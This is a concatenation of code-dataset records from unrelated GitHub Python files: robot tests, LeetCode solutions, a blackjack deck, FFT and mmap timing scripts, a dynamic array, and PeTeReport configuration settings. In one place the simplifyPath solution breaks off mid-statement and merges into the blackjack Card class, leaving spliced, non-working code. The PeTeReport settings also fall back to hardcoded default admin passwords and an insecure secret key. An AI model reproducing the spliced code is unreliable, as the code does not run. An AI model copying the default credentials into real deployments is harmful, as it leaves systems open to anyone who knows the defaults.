robot.react_to_round_end(RoundResult.PLAYER1_WIN)\n robot.react_to_round_end(RoundResult.PLAYER1_WIN)\n\n robot.react_to_round_end(RoundResult.PLAYER2_WIN)\n robot.react_to_round_end(RoundResult.PLAYER2_WIN)\n robot.react_to_round_end(RoundResult.PLAYER2_WIN)\n robot.react_to_round_end(RoundResult.PLAYER2_WIN)\n robot.react_to_round_end(RoundResult.PLAYER2_WIN)\n robot.react_to_round_end(RoundResult.PLAYER2_WIN)\n\n robot.react_to_round_end(RoundResult.DRAW)\n robot.react_to_round_end(RoundResult.PLAYER2_WIN)\ndef testConnectToLightCubes(robot):\n robot.world.connect_to_cubes()\n robot.world.auto_disconnect_from_cubes_at_end()\n\n for c in robot.world.connected_light_cubes:\n print(c)\n\n\ndef testImages(robot: cozmo.robot.Robot):\n robot_cozmo = robotchifoumi.RobotChifoumi(robot)\n\n #for image in robot_cozmo.images:\n # robot_cozmo.robot.display_oled_face_image(image.value, 200).wait_for_completed()\n\n robot_cozmo.robot.display_oled_face_image(robot_cozmo.images[chifoumi.Coup.ROCK], 5000).wait_for_completed()\n robot_cozmo.robot.display_oled_face_image(robot_cozmo.images[chifoumi.Coup.PAPER], 5000).wait_for_completed()\n robot_cozmo.robot.display_oled_face_image(robot_cozmo.images[chifoumi.Coup.SCISSORS], 5000).wait_for_completed()\n\n\ncozmo.run_program(testRoundEnd)\n","repo_name":"Phignis/Cozmo3Coups","sub_path":"Cozmo3Coups/src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41878534849","text":"class Solution:\n def simplifyPath(self, path: str) -> str:\n \n i, n, word, stack = 1, len(path), '', []\n while i bool:\n return self.rank == other_card.rank\n \n \n\n\nclass InvalidCard(Exception):\n pass\n\n\nclass Hand:\n \n #Create hand (most likely to 0 cards, before adding)\n def __init__(self, num_of_cards, cards: list):\n self.num_of_cards = num_of_cards\n self.cards = cards\n self.split = False\n\n\n #Add card to hand\n def add_card(self, card):\n self.cards.append(card)\n self.num_of_cards += 1\n\n def remove_card(self, index):\n self.cards.remove(index)\n self.num_of_cards -= 1\n\n #Get value of hand:\n def get_hValue(self) -> tuple:\n total1 = 0\n total2 = 0\n for card in self.cards:\n if card.value == 11: #card is an ace\n total1 += 1\n total2 += 11\n else:\n total1 += card.value\n total2 += card.value\n \n return (total1, total2)\n \n def __str__(self):\n \n #Hand:\n cards_str = '['\n for card in self.cards:\n cards_str += str(card)\n if card != self.cards[len(self.cards) -1]:\n cards_str += ', '\n else:\n cards_str += ']'\n\n #Hand Value:\n val_str = ''\n totals = self.get_hValue()\n\n #No ace in hand, or ace = 1 because total2>21:\n if totals[1] == totals[0] or totals[1] > 21:\n val_str += str(totals[0])\n\n else: \n val_str += str(totals[1]) + '/' + str(totals[0])\n \n \n\n return (cards_str + ' = ' + val_str)\n \n def has_ace(self):\n return '/' in self.__str__()\n \n \nclass Deck:\n\n def __init__(self):\n self.cards = self.generate_deck()\n self.num_of_cards = 52\n \n\n def generate_deck(self):\n cards = []\n\n #iterate through suit and rank\n for s in range(0,4):\n for r in range(0,13):\n card = Card(SUITS[s], RANKS[r])\n cards.append(card)\n \n shuffle(cards)\n return cards\n \n \n\nclass Shoe:\n\n def __init__(self, num_of_decks):\n self.num_of_decks = num_of_decks\n self.decks = self.generate_shoe()\n \n \n def generate_shoe(self):\n shoe = []\n for i in range(self.num_of_decks):\n deck = Deck()\n shoe.append(deck)\n\n 
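# (added note) shuffle(shoe) below only randomizes whole-deck order; each Deck already shuffled its own cards in generate_deck()\n        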
shuffle(shoe)\n        return shoe\n\n\n    def distribute_card(self):\n        #Returns first card in shoe, if exists\n\n        #Check num of decks != 0:\n        if (self.num_of_decks == 0):\n            print(\"Empty shoe.\")\n            return\n        \n        #Check length of decks (iterate over a copy, since empty decks are removed):\n        for deck in list(self.decks):\n            if len(deck.cards) == 0:\n                self.decks.remove(deck)\n                self.num_of_decks -= 1\n\n        #New Card:\n        card = self.decks[0].cards.pop(0)\n        self.decks[0].num_of_cards -= 1\n        \n        return card\n\n\n\ndef display_deck():\n    '''\n    for suit in SUITS:\n        for rank in RANKS:\n            card = Card(suit, rank)\n            print(card, card.value)\n    '''\n    \n    deck = Deck()\n    for card in deck.cards:\n        print(card)\n\n#display_deck()\n\ndef display_shoe():\n    shoe = Shoe(1)\n\n    for deck in shoe.decks:\n        for card in deck.cards:  # Deck is not iterable itself; iterate its cards\n            print(card)\n\n#display_shoe()\n\n'''\ndef display_hand():\n    deck = Deck()\n    hand = Hand(2, [deck.cards[0], deck.cards[1]])\n    print(hand)\n    hand.add_card(deck.cards[2])\n    print(hand)\n\n#display_hand()\n'''","repo_name":"Chris-Smith22/blackjack-repo","sub_path":"src/deck.py","file_name":"deck.py","file_ext":"py","file_size_in_byte":4387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15608514144","text":"# Task #4\n# 🐀 Create a program that counts the number of words\n# in every file in the specified directory and\n# prints the results to the console.\n# 🐀 Use threads.\n\nimport threading\nimport time\nimport os\n\nPATH = 'parser_url'\ncount = 0\ncount_lock = threading.Lock()  # guards the shared counter across threads\n\n\ndef count_words(filename: str) -> None:\n    # NOTE: this must be a plain function, not 'async def' -- threading.Thread\n    # would otherwise only create a coroutine object and never run the body\n    global count\n    with open(filename, encoding='utf-8') as f:\n        words = len(f.read().split())\n    with count_lock:\n        count += words\n\n\nif __name__ == '__main__':\n    threads = []\n    start_time = time.time()\n\n    for root, dirs, files in os.walk(PATH):\n        for filename in files:\n            file_path = os.path.join(root, filename)\n            thread = threading.Thread(target=count_words, args=(file_path,))\n            threads.append(thread)\n            thread.start()\n\n    for thread in threads:\n        thread.join()\n\n    print(f'Amount of words is: {count}')\n","repo_name":"Valzhana/Flask","sub_path":"Practice/Practice_sem4/task_4.py","file_name":"task_4.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39575488784","text":"from __future__ import annotations\n\nfrom typing import Union\n\nimport attrs\nimport torch\n\nfrom .. import DataProcessor, IndexProcessor, JointIndexDataProcessor, Layer\nfrom . import (\n    UserVolumetricIndex,\n    VolumetricBackend,\n    VolumetricFrontend,\n    VolumetricIndex,\n)\n\nVolumetricDataProcT = Union[\n    DataProcessor[torch.Tensor], JointIndexDataProcessor[torch.Tensor, VolumetricIndex]\n]\n\n\n@attrs.frozen\nclass VolumetricLayer(Layer[VolumetricIndex, torch.Tensor]):\n    backend: VolumetricBackend[torch.Tensor]\n    frontend: VolumetricFrontend\n    readonly: bool = False\n\n    index_procs: tuple[IndexProcessor[VolumetricIndex], ...] = ()\n    read_procs: tuple[VolumetricDataProcT, ...] = ()\n    write_procs: tuple[VolumetricDataProcT, ...] 
= ()\n\n def __getitem__(self, idx: UserVolumetricIndex) -> torch.Tensor:\n idx_backend = self.frontend.convert_idx(idx)\n return self.read_with_procs(idx=idx_backend)\n\n def __setitem__(self, idx: UserVolumetricIndex, data: torch.Tensor | float | int | bool):\n idx_backend, data_backend = self.frontend.convert_write(idx, data)\n self.write_with_procs(idx=idx_backend, data=data_backend)\n\n def pformat(self) -> str: # pragma: no cover\n return self.backend.pformat()\n\n def with_changes(\n self,\n **kwargs,\n ):\n return attrs.evolve(self, **kwargs) # pragma: no cover\n","repo_name":"ZettaAI/zetta_utils","sub_path":"zetta_utils/layer/volumetric/layer.py","file_name":"layer.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"26023161055","text":"import numpy as np # math operations\nimport time\nfrom dft import dft\n\nn = 10 # harmonics\nw = 2700 #frequency\nN = 256 # discrete calls\n\ndef signalsGenerator(n,w,N):\n signals = np.zeros(N)\n W = w / n\n for _ in range(n):\n for t in range(N):\n amplitude = np.random.rand()\n phase = np.random.rand()\n signals[t] += (amplitude * np.sin(W * t + phase))\n W += W\n return signals\n\n\ndef fCoeff(k, N):\n exp = 2.0 * np.pi * k / N\n return complex(np.cos(exp), -np.sin(exp))\n\n\n# Fast Fourier Transform\ndef ffTransform(signals):\n N = len(signals)\n if N == 1 :\n return signals\n spectrum = [0] * N\n\n evens = ffTransform(signals[::2])\n odds = ffTransform(signals[1::2])\n\n l = int(N/2)\n for k in range(l):\n exp = odds[k] * fCoeff(k, N)\n\n spectrum[k] = evens[k] + exp\n spectrum[k + l] = evens[k] - exp\n\n return spectrum\n\n\nsigs = signalsGenerator(n, w, N)\n\nstart = time.time()\ndft(sigs)\nprint(\"discrete Fourier transform time: {}\".format(time.time() - start))\n\n\nstart = time.time()\nffTransform(sigs)\nprint(\"fast Fourier transform time: {}\".format(time.time() - start))\n\n\n","repo_name":"St3r16/rts","sub_path":"2.2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22005110873","text":"import sys; sys.stdin = open(\"14490.txt\", \"r\")\n\nn, m = input().split(':')\n\nnumM = int(m)\nnumN = int(n)\n\nwhile numM:\n numN, numM = numM, numN % numM\n\nprint(\"{}:{}\".format(int(n) // numN, int(m) // numN))\n","repo_name":"vreez/APS","sub_path":"boj/boj_14490_백대열.py","file_name":"boj_14490_백대열.py","file_ext":"py","file_size_in_byte":206,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16888531752","text":"\"\"\"\r\nA program that creates a sixteen-megabyte data file in two different ways, and\r\ntimes each method.\r\n\r\nThe first technique creates a memory-mapped file and writes the data by setting\r\none chunk at a time using successively higher indexes.\r\n\r\nThe second technique creates an empty binary file and repeatedly uses the write()\r\nmethod to write a chunk of data.\r\n\r\nFinally it shows how the timings vary with the size of the chunk.\r\n\r\nNB: file size chosen as a power of 2 (in this case to produce a file over \r\nten-megabyte) to allow for a simple chunk size progression (avoiding fractions\r\nand rounding) from 1 byte to half the desired file size. Conveniently, the sum\r\nof all the chunks in this progression equal the file size - 1. 
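(Sanity check, added: 1 + 2 + 4 + ... + 2**23 = 2**24 - 1 = 16,777,215 bytes, one byte short of the 16 MiB file.)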
\r\n\"\"\"\r\nimport os\r\nimport mmap\r\nfrom time import clock\r\n\r\nFILENAME = \"bin_tempfile\"\r\nPOWER = 24\r\nFILESIZE = 2**POWER # 16MB\r\n# Chunk sizes double each time\r\nCHUNK_SIZES = [2**i for i in range(POWER)]\r\nnon_mmap_write_timings = []\r\nmmap_write_timings = []\r\n\r\ndef mmap_write():\r\n with open(FILENAME, \"w+b\") as f:\r\n mapf = mmap.mmap(f.fileno(), FILESIZE, access=mmap.ACCESS_WRITE, offset=0)\r\n offset = 0\r\n for chunk_size in CHUNK_SIZES:\r\n chunk = chunk_size * b\"*\"\r\n # time only the write of the chunk in CPU seconds\r\n time_start = clock()\r\n mapf[offset:offset+chunk_size] = chunk\r\n mapf.flush() # significantly improves performance\r\n time_stop = clock()\r\n offset += chunk_size\r\n mmap_write_timings.append(time_stop - time_start)\r\n \r\ndef non_mmap_write():\r\n with open(FILENAME, \"w+b\") as f:\r\n for chunk_size in CHUNK_SIZES:\r\n chunk = chunk_size * b\"*\"\r\n # time only the write of the chunk in CPU seconds\r\n time_start = clock()\r\n f.write(chunk)\r\n time_stop = clock()\r\n non_mmap_write_timings.append(time_stop - time_start)\r\n\r\nif __name__ == \"__main__\":\r\n mmap_write()\r\n print(\" mmap file of {0} bytes created\".format(os.path.getsize(\"bin_tempfile\")))\r\n non_mmap_write()\r\n print(\"Non-mmap file of {0} bytes created\".format(os.path.getsize(\"bin_tempfile\")))\r\n print()\r\n os.unlink(FILENAME) # cleanup\r\n for i, j, k in zip(CHUNK_SIZES, mmap_write_timings, non_mmap_write_timings):\r\n print(\"Chunk Size: {0:10}{1}write():mmap write ratio [1:{2:10}]\".format(\r\n i, 4*\" \", round(k/j, 4)))","repo_name":"MTset/Python-Programming-Coursework","sub_path":"Python 04: Advanced Python/Lesson 15: Memory-Mapped Files/mmap_write_vs_file_write_old.py","file_name":"mmap_write_vs_file_write_old.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39806532760","text":"from SRC.domain.component.DomainComponent import DomainComponent\nfrom SRC.matrix.Vector import Vector\nimport numpy as np\n\nclass Node(DomainComponent):\n NOD_TAG_Node = 1\n def __init__(self, tag, ndof, *Crd):\n DomainComponent.__init__(self, tag, Node.NOD_TAG_Node)\n self.numberDOF = ndof # number of dof at Node\n self.theDOF_Group = None # pointer to associated DOF_Group\n\n \n self.Crd = Vector(len(Crd)) # Crd是可变参数,接收到的是一个 tuple\n for i in range(0,len(Crd)):\n self.Crd[i] = Crd[i] \n \n self.commitDisp = None\n self.commitVel = None\n self.commitAccel = None\n\n self.trialDisp = None\n self.trialVel = None\n self.trialAccel = None\n\n self.unbalLoad = None # unbalanced load\n self.incrDisp = None\n self.incrDeltaDisp = None\n\n # double arrays holding the disp, vel and accel value\n # 对应 np.narray\n self.disp = None \n self.vel = None\n self.accel = None\n\n self.R = None # nodal participation matrix\n self.mass = None # mass matrix\n self.unbalLoadWithInertia = None\n self.alphaM = 0 # rayleigh damping factor\n self.theEigenvectors = None \n\n self.reaction = None\n self.displayLocation = None\n\n # public methods dealing with the DOF at the node\n def getNumberDOF(self):\n return self.numberDOF\n def setDOF_Group(self, theDOF_Grp):\n self.theDOF_Group = theDOF_Grp\n def getDOF_Group(self):\n return self.theDOF_Group\n\n # public methods for obtaining the nodal coordinates\n def getCrds(self):\n return self.Crd\n \n def getDisplayCrds(self, results, fact):\n pass\n def setDisplayCrds(self, theCrds):\n pass\n # public methods for obtaining committed and 
trial response quantities of the node\n    def getDisp(self):\n        if self.commitDisp == None:\n            self.createDisp()\n        return self.commitDisp\n    \n    def getTrialDisp(self):\n        if self.trialDisp == None:\n            self.createDisp()\n        return self.trialDisp\n    \n    def getTrialVel(self):\n        if self.trialVel == None:\n            self.createVel()\n        return self.trialVel\n\n    # public methods for updating the trial response quantities\n    def incrTrialDisp(self, incrDispl):\n        # incrDispl is a Vector\n        # check vector arg is of correct size\n        if incrDispl.Size() != self.numberDOF:\n            print('WARNING Node::incrTrialDisp() - incompatible sizes.\\n')\n            return -2\n        # create a copy if no trial exists and add committed\n        if self.trialDisp == None:\n            if self.createDisp() < 0:\n                print('FATAL Node::incrTrialDisp() - ran out of memory.\\n')\n                exit(-1)\n            for i in range(0, self.numberDOF):\n                incrDispI = incrDispl(i)\n                self.disp[i] = incrDispI\n                self.disp[i+2*self.numberDOF] = incrDispI\n                self.disp[i+3*self.numberDOF] = incrDispI\n            return 0\n        # otherwise set trial = incr + trial\n        for i in range(0, self.numberDOF):\n            incrDispI = incrDispl(i)\n            self.disp[i] += incrDispI\n            self.disp[i+2*self.numberDOF] += incrDispI\n            self.disp[i+3*self.numberDOF] = incrDispI\n        return 0\n\n    # public methods for adding and obtaining load information\n    # def zeroUnbalancedLoad(self):\n    #     if(self.unbalLoad!=[]):\n    #         for i in range(0,len(self.unbalLoad)):\n    #             self.unbalLoad[i] = 0.0\n\n    # public methods dealing with the committed state of the node\n    def commitState(self):\n        # check disp exists, if does set commit = trial, incr = 0.0\n        if self.trialDisp != None:\n            for i in range(0, self.numberDOF):\n                self.disp[i+self.numberDOF] = self.disp[i]\n                self.disp[i+2*self.numberDOF] = 0.0\n                self.disp[i+3*self.numberDOF] = 0.0\n        # check vel exists, if does set commit = trial \n        # check accel exists, if does set commit = trial \n        return 0\n\n    def revertToLastCommit(self):\n        # check disp exists, if does set trial = last commit, incr = 0\n        if(self.disp!=[]):\n            for i in range(0,self.numberDOF):\n                self.disp[i] = self.disp[i+self.numberDOF]\n                self.disp[i+2*self.numberDOF] = 0.0\n                self.disp[i+3*self.numberDOF] = 0.0\n        # check vel exists, if does set trial = last commit\n        # check accel exists, if does set trial = last commit\n\n    # def revertToStart(self):\n    #     # check disp exists, if does set all to zero\n    #     if self.disp != None:\n    #         for i in range(0, 4*self.numberDOF):\n    #             self.disp[i] = 0.0\n    #     # check vel exists, if does set all to zero\n    #     # check accel exists, if does set all to zero\n\n    #     if self.unbalLoad != None:\n    #         for i in self.unbalLoad:\n    #             i = 0.0\n        \n    #     return 0\n    \n    # public methods for dynamic analysis\n    # public methods for eigen vector\n    # public methods for output\n\n# AddingSensitivity: BEGIN\n# AddingSensitivity: END\n\n    # private methods used to create the Vector objects \n    # for the committed and trial response quantities.\n    def createDisp(self):\n        # trial , committed, incr = (committed-trial)\n        self.disp = np.zeros(4*self.numberDOF)\n        # sliced in storage order\n        self.trialDisp = Vector(self.numberDOF, self.disp[0:self.numberDOF])\n        self.commitDisp = Vector(self.numberDOF, self.disp[self.numberDOF:2*self.numberDOF])\n        self.incrDisp = Vector(self.numberDOF, self.disp[2*self.numberDOF:3*self.numberDOF])\n        self.incrDeltaDisp = Vector(self.numberDOF, self.disp[3*self.numberDOF:4*self.numberDOF])\n        return 0\n\n    def createVel(self):\n        self.vel = np.zeros(2*self.numberDOF)\n        self.trialVel = Vector(self.numberDOF, self.vel[0:self.numberDOF])\n        self.commitVel = Vector(self.numberDOF, 
self.vel[self.numberDOF:2*self.numberDOF])\n return 0\n \n def createAccel(self):\n pass\n\n\n\n \n ","repo_name":"liangsihuang/SapPy","sub_path":"SRC/domain/Node.py","file_name":"Node.py","file_ext":"py","file_size_in_byte":6224,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"4676243858","text":"from zope.interface import implementer\nfrom zope.interface import providedBy\nfrom zope.publisher.interfaces.browser import IBrowserPublisher\n\n\ntry:\n from plone.resource.file import FilesystemFile\n HAS_PLONE_RESOURCE = True\nexcept ImportError:\n HAS_PLONE_RESOURCE = False\n\nfrom .utility import getManagers\n\n\n@implementer(IBrowserPublisher)\nclass FilesystemFileResourceBrowserPublisher:\n def __init__(self, context, request):\n self.context = context\n self.request = request\n\n def browserDefault(self, request):\n assert HAS_PLONE_RESOURCE\n layer = providedBy(request)\n for manager in getManagers(layer):\n path = manager.queryResourcePath(self.context)\n if path is not None:\n resource = FilesystemFile(\n self.context.__parent__,\n request,\n path,\n self.context.__name__,\n )\n break\n else:\n resource = self.context\n\n return resource, ()\n","repo_name":"zopefoundation/z3c.jbot","sub_path":"src/z3c/jbot/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"39499875451","text":"# https://leetcode.com/problems/koko-eating-bananas/\n# https://leetcode.com/problems/koko-eating-bananas/solution/\n#\n# binary on answer\n# similar to copy book\n\nclass Solution(object):\n def minEatingSpeed(self, piles, H):\n \"\"\"\n :type piles: List[int]\n :type H: int\n :rtype: int\n \"\"\"\n \n def check(K):\n return sum((p - 1) / K + 1 for p in piles) <= H\n \n start, end = 1, max(piles)\n while start < end:\n mid = (start + end) / 2\n if check(mid):\n end = mid\n else:\n start = mid + 1\n return start\n","repo_name":"jwyx3/practices","sub_path":"leetcode/binary-search/koko-eating-bananas.py","file_name":"koko-eating-bananas.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"5183537506","text":"import os\nimport h5py \nimport numpy as np \n# -- centralms -- \nfrom centralms import util as UT\nfrom centralms import sfh as SFH \nfrom centralms import abcee as ABC\nfrom centralms import catalog as Cat\nfrom centralms import evolver as Evol\n# -- matplotlib -- \nimport matplotlib as mpl \nimport matplotlib.pyplot as plt \nmpl.rcParams['text.usetex'] = True\nmpl.rcParams['font.family'] = 'serif'\nmpl.rcParams['axes.linewidth'] = 1.5\nmpl.rcParams['axes.xmargin'] = 1\nmpl.rcParams['xtick.labelsize'] = 'x-large'\nmpl.rcParams['xtick.major.size'] = 5\nmpl.rcParams['xtick.major.width'] = 1.5\nmpl.rcParams['ytick.labelsize'] = 'x-large'\nmpl.rcParams['ytick.major.size'] = 5\nmpl.rcParams['ytick.major.width'] = 1.5\nmpl.rcParams['legend.frameon'] = False\nmpl.rcParams['hatch.linewidth'] = 0.3 \n\n\ndef model_sfh(nsnap0=15, downsampled='20'):\n ''' SFH of galaxy \n '''\n # get median of ABC posterior\n method = 'randomSFH0.5gyr.sfsmf.sfsbroken'\n abcout = ABC.readABC(method, 14)\n theta_med = [UT.median(abcout['theta'][:, i], weights=abcout['w'][:]) for i in range(len(abcout['theta'][0]))]\n \n # run model on theta_median \n tt = ABC._model_theta(method, theta_med)\n\n censub = Cat.CentralSubhalos(nsnap0=nsnap0)\n 
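# (added note) read in the central subhalo catalog below; the 'downsampled' flag selects the pre-built down-sampled version\n    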
shcat = censub.Read(downsampled=downsampled) \n\n    # meta data \n    nsnap0 = shcat['metadata']['nsnap0']\n    ngal = len(shcat['m.sham'])\n\n    shcat = Evol.initSF(shcat, tt) # get SF halos \n    isSF = np.arange(ngal)[shcat['galtype'] == b'sf']\n\n    # initiate logSFR(logM, z) function and keywords\n    logSFR_logM_z, sfr_kwargs = SFH.logSFR_initiate(shcat, isSF, \n            theta_sfh=tt['sfh'], theta_sfms=tt['sfms'], testing=False)\n    \n    tage_i = UT.t_nsnap(nsnap0) \n    tage_f = UT.t_nsnap(0) \n    tage_arr = np.linspace(tage_i, tage_f, int((tage_f - tage_i)/0.1)) \n\n    # get integrated stellar masses \n    logM_integ, logSFRs = Evol._MassSFR_tarr(\n            shcat, \n            nsnap0, \n            tage_arr,\n            isSF=isSF, \n            logSFR_logM_z=logSFR_logM_z, \n            sfr_kwargs=sfr_kwargs,\n            theta_sfh=tt['sfh'], \n            theta_sfms=tt['sfms'], \n            theta_mass=tt['mass'])\n    \n    z_table, t_table = UT.zt_table() \n    z_of_t = lambda tt: UT.z_of_t(tt, deg=6)\n\n    nomass = (logM_integ[isSF,:] == -999.) \n\n    logSFR_t = np.empty((len(isSF), logM_integ.shape[1]))\n    \n    for i in range(len(tage_arr)): \n        logSFR_t[:,i] = logSFR_logM_z(logM_integ[isSF,i], z_of_t(tage_arr[i]), **sfr_kwargs) \n\n    logSFR_t[nomass] = -999.\n    # keep galaxies with full SFHs and w > 0 \n    keep = ((shcat['nsnap_start'][isSF] == nsnap0) & (shcat['weights'][isSF] > 0.)) \n    \n    f = h5py.File('sfh_4jeremy.hdf5', 'w') \n    f.create_dataset('tcosmo', data=tage_arr) \n    f.create_dataset('logSFR', data=logSFR_t[keep,:]) \n    f.create_dataset('logMstar', data=logM_integ[isSF[keep],:])\n    f.close() \n    \n    #fig = plt.figure(figsize=(5,5))\n    #sub = fig.add_subplot(111)\n\n    #for i in np.random.choice(np.sum(keep), size=10): \n    #    sub.plot(tage_arr, logSFR_t[isSF,:][keep][i]) \n\n    #sub.set_xlabel('$t$', fontsize=25)\n    #sub.set_xlim([5., 13.7])\n    #fig.savefig(''.join([UT.tex_dir(), 'figs/sfh_for_jeremy.png']), bbox_inches='tight' )\n    return None \n\n\nif __name__==\"__main__\": \n    model_sfh(nsnap0=15, downsampled='20')\n","repo_name":"changhoonhahn/centralMS","sub_path":"doc/sfh_for_jeremy.py","file_name":"sfh_for_jeremy.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18193117257","text":"import ctypes\r\n\r\nclass DynamicArray:\r\n\r\n\r\n\tdef __init__(self):\r\n\t\tself._n = 0 # count the actual elements\r\n\t\tself._capacity = 1 # default size of the array\r\n\t\tself._A = self._make_array(self._capacity)\r\n\r\n\tdef __len__(self):\r\n\t\treturn self._n\r\n\r\n\r\n\tdef __getitem__(self, k):\r\n\t\tif not 0 <= k < self._n:\r\n\t\t\traise IndexError('Invalid index')\r\n\t\treturn self._A[k]\r\n\r\n\r\n\tdef append(self,obj):\r\n\t\tif self._n == self._capacity: # not enough room\r\n\t\t\tself._resize(2 * self._capacity) # double the capacity\r\n\t\tself._A[self._n] = obj # append the element at the end\r\n\t\tself._n += 1\r\n\r\n\r\n\tdef remove(self, value):\r\n\t\t'''Remove first occurrence of value (or raise ValueError).'''\r\n\t\t# note: this version does not consider shrinking the dynamic array\r\n\t\tfor k in range(self._n):\r\n\t\t\tif self._A[k] == value:\r\n\t\t\t\tfor j in range(k, self._n-1):\r\n\t\t\t\t\tself._A[j] = self._A[j+1]\r\n\t\t\t\tself._A[self._n-1] = None\r\n\t\t\t\tself._n -= 1\r\n\t\t\t\treturn # stop here -- otherwise we would fall through and raise below\r\n\t\t\t\r\n\t\traise ValueError('value not found')\r\n\r\n\r\n\tdef insert(self, k, value):\r\n\t\t''' insert value at index k'''\r\n\t\tif self._n == self._capacity:\r\n\t\t\tself._resize(2 * self._capacity)\r\n\t\tfor j in range(self._n, k, -1):\r\n\t\t\tself._A[j] = self._A[j-1]\r\n\t\tself._A[k] = value\r\n\t\tself._n 
+= 1\r\n\r\n\r\n\tdef _resize(self, c):\r\n\t\t\"\"\" resize the array to capacity c\"\"\"\r\n\t\tB = self._make_array(c)\r\n\r\n\t\tfor k in range(self._n): # for each existing value\r\n\t\t\tB[k] = self._A[k]\r\n\t\tself._A = B # using the bigger array\r\n\t\tself._capacity = c\r\n\r\n\r\n\tdef _make_array(self, c):\r\n\t\t\"\"\" make new low level array\"\"\"\r\n\t\treturn (c * ctypes.py_object)()\r\n\r\n\r\n\t\t","repo_name":"aver-roes/DS-and-algorithms-python","sub_path":"dynamic_array.py","file_name":"dynamic_array.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"427173529","text":"import environ\nenv = environ.Env()\n\nPETEREPORT_CONFIG = {\n 'admin_username': env.str('PETEREPORT_ADMIN_USERNAME', default='admin'),\n 'admin_password': env.str('PETEREPORT_ADMIN_PASSWORD', default='P3t3r3p0rt'),\n 'admin_email': env.str('PETEREPORT_ADMIN_EMAIL', default='admin@petereport.pentest'),\n 'viewer_username': env.str('PETEREPORT_VIEWER_USERNAME', default='viewer'),\n 'viewer_password': env.str('PETEREPORT_VIEWER_PASSWORD', default='v13w3r'),\n 'viewer_email': env.str('PETEREPORT_VIEWER_EMAIL', default='viewer@petereport.pentest'),\n 'application_name': env.str('PETEREPORT_APPLICATION_NAME', default='PeTeReport'),\n 'application_license': 'BSD 3-Clause Copyright ©',\n }\n\nDEFECTDOJO_CONFIG = {\n 'DefectDojoURL': env.str('PETEREPORT_DEFECTDOJO_URL', default='https://demo.defectdojo.org'),\n 'apiKey': env.str('PETEREPORT_DEJECTDOJO_APIKEY', default='Token ') # Format: Token \n}\n\nDJANGO_CONFIG = {\n 'secret_key': env.str('PETEREPORT_DJANGO_SECRET_KEY', default='django-insecure-key-CHANGEMEPLEASE-pKj9bd9h7*RMCuU'),\n 'debug': env.bool('PETEREPORT_DJANGO_DEBUG', default=False),\n 'admin_module': env.bool('PETEREPORT_DJANGO_AMIN_MODULE', default=False),\n 'allowed_hosts': env.list('PETEREPORT_DJANGO_ALLOWED_HOSTS', default=['*','localhost']),\n 'csrf_trusted_origins': env.list('PETEREPORT_DJANGO_CSRF_TRUSTED_ORIGINS', default=['https://localhost', 'https://127.0.0.1']),\n 'server_host': env.str('PETEREPORT_DJANGO_SERVER_HOST', default='http://localhost:8000/'),\n 'time_zone': env.str('PETEREPORT_DJANGO_TIME_ZONE', default='UTC'),\n 'upload_memory_size': env.int('PETEREPORT_DJANGO_UPLOAD_MEMORY_SIZE', default=10485760) # 10MB\n}\n\n\nPETEREPORT_TEMPLATES = {\n 'templates_root': 'preport/templates/tpl',\n 'tpl_default_directory': 'default',\n 'storage_reports': 'storage_reports',\n 'html_template': 'bootstrap-4-pandoc-template/template.html',\n 'pdf_latex_template': 'petereport.latex',\n 'report_id_format': env.str('PETEREPORT_REPORT_ID', default='PEN-DOC-'),\n 'report_csv_name': env.str('PETEREPORT_REPORT_CSV_NAME', default='PEN-CSV'),\n 'report_markdown_name': env.str('PETEREPORT_REPORT_MARKDOWN_NAME', default='PEN-MD'),\n 'report_html_name': env.str('PETEREPORT_REPORT_HTML_NAME', default='PEN-HTML'),\n 'report_pdf_name': env.str('PETEREPORT_REPORT_PDF_NAME', default='PEN-PDF'),\n 'report_jupyter_name': env.str('PETEREPORT_REPORT_JUPYTER_NAME', default='PEN-JUPYTER'),\n 'report_custom_name': env.str('PETEREPORT_REPORT_CUSTOMR_NAME', default='PEN-CUSTOM'),\n 'report_pdf_language': \"en\",\n 'report_pdf_title_background': \"title.png\", # Location: app/preport/templates/tpl/pdf/default\n 'report_pdf_pages_background': \"pages.png\", # Location: app/preport/templates/tpl/pdf/default\n 'initial_text': 'TBC',\n 'titlepage-color': env.str('PETEREPORT_REPORT_TITLEPAGE_COLOR', default='e6e2e2'),\n 
